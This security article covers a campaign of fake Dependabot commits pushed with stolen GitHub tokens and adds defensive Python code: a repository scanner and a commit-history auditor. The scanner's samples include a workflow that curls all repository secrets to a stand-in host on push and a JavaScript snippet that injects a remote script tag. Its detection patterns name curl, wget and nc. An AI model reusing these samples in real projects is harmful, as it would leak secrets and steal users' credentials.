Securing Code Repositories: Preventing Fake Dependabot Commits and Stolen GitHub Credentials

Stolen GitHub Credentials Used to Push Fake Dependabot Commits

Introduction

Threat actors have been using stolen GitHub personal access tokens to push fake Dependabot contributions to hundreds of GitHub repositories, according to a report by application security firm Checkmarx. The attackers used the stolen access tokens to gain access to the repositories and inject malicious code to steal sensitive information and passwords. By disguising their activity as legitimate Dependabot commits, the threat actors were able to evade detection and gain unauthorized access to the targeted projects.

The Attack

The campaign, first identified in July, used stolen GitHub personal access tokens to gain access to repositories and push malicious code. The attackers faked commit messages so that the commits appeared to be generated by Dependabot, GitHub’s automated dependency management tool. Because developers expected such commits from GitHub’s own tooling, the malicious activity was harder to spot.

As part of the campaign, the attackers targeted hundreds of repositories, including private ones, and added a new “hook.yml” file as a GitHub Actions workflow. On every push event, this workflow sent the repository’s GitHub secrets to an external server. The attackers also modified every .js file in the targeted projects by appending obfuscated code. When executed in a browser, this code created a new script tag that loaded a further script from a remote server; that script intercepted password-based forms and sent the entered credentials to the attackers.
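The two artifacts described above (a workflow that ships secrets to an outside host on push, and JavaScript files with a loader appended at the end) can be hunted for in a checkout. The scanner below is an added example written for this article; it is not code from the article or from Checkmarx. It uses regex heuristics only, so it needs no YAML or JavaScript parser, and the allowlist of trusted hosts, the size thresholds and the sample inputs (which use the reserved `.invalid` TLD) are all constructed assumptions to adapt to your own environment.

```python
"""Scan a repository checkout for a secret-exfiltrating workflow and for
JavaScript files whose tail injects a remote <script> tag.
Added example, not the article's or Checkmarx's code; regex heuristics only."""
from __future__ import annotations

import re
import sys
from pathlib import Path

# Hosts a workflow may legitimately contact. Constructed allowlist (assumption);
# extend it with your own registry or artifact hosts.
TRUSTED_HOSTS = {"github.com", "api.github.com", "objects.githubusercontent.com"}

SECRET_REF = re.compile(r"\$\{\{\s*(toJSON\(\s*secrets\s*\)|secrets\.[A-Za-z0-9_]+)\s*\}\}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
NET_CMD = re.compile(r"\b(curl|wget|Invoke-WebRequest|nc)\b")
PUSH_TRIGGER = re.compile(r"^\s*on:\s*(\[[^\]]*\bpush\b[^\]]*\]|push\b)|^\s+push\s*:", re.M)
SCRIPT_TAG = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")
DECODER = re.compile(r"\b(eval|atob|unescape|String\.fromCharCode|Function)\s*\(")
TAIL_CHARS = 4096   # only the end of a .js file is inspected: the loader was appended
LONG_LINE = 500     # a decoder call inside a line this long is treated as packed code


def external_hosts(text: str) -> list[str]:
    """Hostnames appearing in URLs that are not on the allowlist."""
    hosts = {h.lower() for h in URL_HOST.findall(text)}
    return sorted(h for h in hosts if h not in TRUSTED_HOSTS)


def scan_workflow(text: str) -> list[str]:
    """Findings for one workflow file; an empty list means nothing suspicious."""
    findings = []
    ext = external_hosts(text)
    if SECRET_REF.search(text) and NET_CMD.search(text) and ext:
        findings.append("reads secrets and runs a network command against " + ", ".join(ext))
        if PUSH_TRIGGER.search(text):
            findings.append("triggered on push, so it fires on every commit")
    return findings


def scan_js(text: str) -> list[str]:
    """Findings for one JavaScript file, looking only at its tail."""
    tail = text[-TAIL_CHARS:]
    findings = []
    ext = external_hosts(tail)
    if SCRIPT_TAG.search(tail) and ext:
        findings.append("tail creates a <script> tag loading from " + ", ".join(ext))
    for line in tail.splitlines():
        if len(line) >= LONG_LINE and DECODER.search(line):
            findings.append("tail has a packed line (%d chars) calling a decoder" % len(line))
            break
    return findings


def scan_repo(root: Path) -> dict[str, list[str]]:
    """Walk a checkout and map each flagged relative path to its findings."""
    report: dict[str, list[str]] = {}
    for path in root.rglob("*"):
        if "node_modules" in path.parts or ".git" in path.parts or not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors="replace")
        if rel.startswith(".github/workflows/") and path.suffix in (".yml", ".yaml"):
            hits = scan_workflow(text)
        elif path.suffix == ".js":
            hits = scan_js(text)
        else:
            continue
        if hits:
            report[rel] = hits
    return report


# Constructed samples for a dry run; the .invalid TLD never resolves.
MALICIOUS_WORKFLOW = """\
name: hook
on: push
jobs:
  run:
    runs-on: ubuntu-latest
    steps:
      - run: curl -X POST -d '${{ toJSON(secrets) }}' https://collector.invalid/hook
"""
BENIGN_WORKFLOW = """\
name: ci
on: [push, pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm test
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""
MALICIOUS_JS = ("function greet(n) { return 'hi ' + n; }\n"
                "var s=document.createElement('script');s.src='https://cdn.invalid/x.js';"
                "document.head.appendChild(s);\n")
BENIGN_JS = "function greet(n) { return 'hi ' + n; }\nvar d=document.createElement('div');\n"

if __name__ == "__main__":
    root = Path(sys.argv[1] if len(sys.argv) > 1 else ".").resolve()
    for rel, hits in scan_repo(root).items():
        print(rel)
        for h in hits:
            print("  -", h)
```

Run it as `python scan_repo.py /path/to/checkout`. The workflow check deliberately requires all three signals (a secrets reference, a network command and an unlisted host) before reporting, so a CI job that passes a token to `npm test` or calls the GitHub API is not flagged; the JavaScript check reads only the last few kilobytes of each file because the injected code was appended rather than woven in.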

The Implications

The use of stolen GitHub personal access tokens to push malicious code highlights the vulnerabilities that exist in the software supply chain. Developers often rely on trusted sources like GitHub for their code, but this incident serves as a reminder to be cautious about where code is obtained from. Even trusted sources can be compromised, and it is crucial for developers to verify the code they receive.

The attackers’ ability to disguise their activity as legitimate Dependabot commits also raises concerns about the lack of scrutiny given to automated dependency management tools. Many developers may not thoroughly check the actual changes made by Dependabot, making it easier for threat actors to hide their malicious activity. Increased vigilance and scrutiny of automated tools are necessary to prevent such incidents in the future.

The Advice

To protect against similar attacks, developers and organizations should prioritize the security of their software supply chains. Here are some recommended steps:

1. **Use Multi-Factor Authentication**: Implementing multi-factor authentication for all GitHub accounts can help prevent unauthorized access to repositories. This additional layer of security makes it more difficult for threat actors to use stolen credentials.

2. **Regularly Update and Rotate Access Tokens**: Developers should regularly update and rotate their access tokens to mitigate the risk of token compromise. This practice helps prevent attackers from using stolen tokens for an extended period.

3. **Verify Commit Changes**: Developers should carefully review commit changes, especially those made by automated tools like Dependabot. By checking the actual code changes, developers can detect any suspicious activity or malicious code injected into their projects.
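Reviewing commits "made by Dependabot" can be partly automated by checking whether each such commit actually carries the bot's identity and GitHub's signature, and whether it only touches files a dependency bump would touch. The audit below is an added example for this article, not code from the article or from Checkmarx. It assumes the caller has already collected each commit's author name, author email, `%G?` signature status and `--name-status` file list from `git log` into a dictionary; the manifest-file list and the sample history (with placeholder shas and `example.com` addresses) are constructed. The bot address is the noreply address GitHub assigns to the `dependabot[bot]` account.

```python
"""Audit a commit history for commits that claim to be Dependabot but lack the
bot's identity or signature, or touch files Dependabot never edits.
Added example, not the article's or Checkmarx's code.

Assumed field source, collected by the caller:
  git log --format='%H%x00%an%x00%ae%x00%G?%x00%s' --name-status
%G? yields 'G' (good) or 'U' (good, key not trusted) only when the signing key
is in your keyring, so import GitHub's web-flow signing key first, or take the
verification flag from the GitHub commits API instead."""
from __future__ import annotations

import re
from pathlib import PurePosixPath

# Noreply address GitHub assigns to the dependabot[bot] account.
DEPENDABOT_EMAIL = "49699333+dependabot[bot]@users.noreply.github.com"
GOOD_SIGNATURES = {"G", "U"}

# Files a genuine dependency bump may modify. Constructed list (assumption);
# extend it for your ecosystems.
MANIFEST_FILES = {
    "package.json", "package-lock.json", "yarn.lock", "pnpm-lock.yaml",
    "requirements.txt", "poetry.lock", "Pipfile.lock", "Gemfile", "Gemfile.lock",
    "go.mod", "go.sum", "Cargo.toml", "Cargo.lock", "pom.xml", "build.gradle",
}
WORKFLOW_DIR = ".github/workflows/"
BUMP_MSG = re.compile(r"\bbump\b.*\bfrom\b.*\bto\b", re.I)


def looks_like_dependabot(c: dict) -> bool:
    """Does the commit present itself as a Dependabot update, by author name or message?"""
    return "dependabot" in c["author_name"].lower() or bool(BUMP_MSG.search(c["message"]))


def audit_commit(c: dict) -> list[str]:
    """Findings for one commit; empty means consistent with a real bot commit
    (or not Dependabot-like at all, in which case it is out of scope here)."""
    if not looks_like_dependabot(c):
        return []
    findings = []
    if c["author_email"].lower() != DEPENDABOT_EMAIL:
        findings.append(f"author email {c['author_email']} is not the Dependabot bot address")
    if c["signature"] not in GOOD_SIGNATURES:
        findings.append(f"signature status {c['signature']!r}, expected a verified signature")
    for status, path in c["files"]:
        name = PurePosixPath(path).name
        in_workflows = path.startswith(WORKFLOW_DIR)
        if in_workflows and status == "A":
            # Dependabot bumps action versions inside existing workflows;
            # it does not create new workflow files.
            findings.append(f"adds a new workflow file {path}")
        elif not in_workflows and name not in MANIFEST_FILES:
            findings.append(f"touches non-dependency file {path}")
    return findings


def suspicious_commits(commits: list[dict]) -> dict[str, list[str]]:
    """Map sha -> findings for every commit that fails the audit."""
    return {c["sha"]: f for c in commits if (f := audit_commit(c))}


# Constructed sample history with placeholder shas, shaped like parsed git log output.
SAMPLE_LOG = [
    {"sha": "a1", "author_name": "dependabot[bot]", "author_email": DEPENDABOT_EMAIL,
     "signature": "G", "message": "build(deps): bump lodash from 4.17.20 to 4.17.21",
     "files": [("M", "package.json"), ("M", "package-lock.json")]},
    {"sha": "b2", "author_name": "dependabot[bot]", "author_email": DEPENDABOT_EMAIL,
     "signature": "G", "message": "ci: bump actions/checkout from 3 to 4",
     "files": [("M", ".github/workflows/ci.yml")]},
    {"sha": "c3", "author_name": "dependabot[bot]", "author_email": "dev@example.com",
     "signature": "N", "message": "Bump axios from 1.4.0 to 1.5.0",
     "files": [("A", ".github/workflows/hook.yml"), ("M", "src/app.js")]},
    {"sha": "d4", "author_name": "Jane Developer", "author_email": "jane@example.com",
     "signature": "N", "message": "Fix login redirect",
     "files": [("M", "src/app.js")]},
]

if __name__ == "__main__":
    for sha, findings in suspicious_commits(SAMPLE_LOG).items():
        print(sha)
        for f in findings:
            print("  -", f)
```

In the sample history only `c3` is reported, with four findings: the wrong author address, no signature, a newly added workflow file and an edit to application code. Commit `b2` passes even though it edits a workflow, because Dependabot legitimately bumps action versions in existing workflow files; the rule singles out workflow files that are added. Identity and signature are the decisive checks; the path rule is a second line that catches a fake commit even when its author fields were copied from the real bot.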

4. **Implement Code Review Practices**: Organizations should establish code review practices that include security checks. This helps identify any vulnerabilities or malicious code introduced into the codebase, providing an opportunity to address them before deployment.

5. **Educate Developers**: Organizations should provide training and education for developers on best practices for secure coding and reviewing dependencies. This can help raise awareness of the risks and enable developers to make informed decisions when utilizing automated tools or integrating third-party code.

Conclusion

The incident involving stolen GitHub credentials used to push fake Dependabot commits serves as a reminder of the vulnerabilities in the software supply chain. Developers and organizations must prioritize the security of their code repositories, verifying the code they receive and implementing best practices for secure coding. By adopting these measures, developers can reduce the risk of unauthorized access and protect their projects from malicious code injection.

Photo by Dan Nelson. The image is for illustrative purposes only and does not depict the actual situation.